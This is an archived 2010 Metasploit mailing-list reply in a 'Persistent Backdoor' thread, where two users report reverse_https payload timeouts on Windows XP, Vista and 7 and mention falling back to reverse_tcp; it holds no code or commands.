Metasploit mailing list archives

Re: Persistent Backdoor

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 10 Oct 2010 19:39:15 +0300

Same behavior with REV_HTTPS here, it is not working anymore with XP, Vista
and 7 "x86", no AV.
sorry for going off topic...
Sherif Eldeeb.

On Sun, Oct 10, 2010 at 5:52 PM, Miguel Rios <miguelrios35 () yahoo com> wrote:

Hi,

Yeah I noticed the same behavior with reverse_https lately, which is why
I'm using reverse_tcp for now. Reverse_https used to work very well but now
I also get the timeout issue after it starts sending the initial stage.
Sorry I can't really help. I can only confirm I'm getting the same issue
with that payload, independently if its persistent or not.

cheers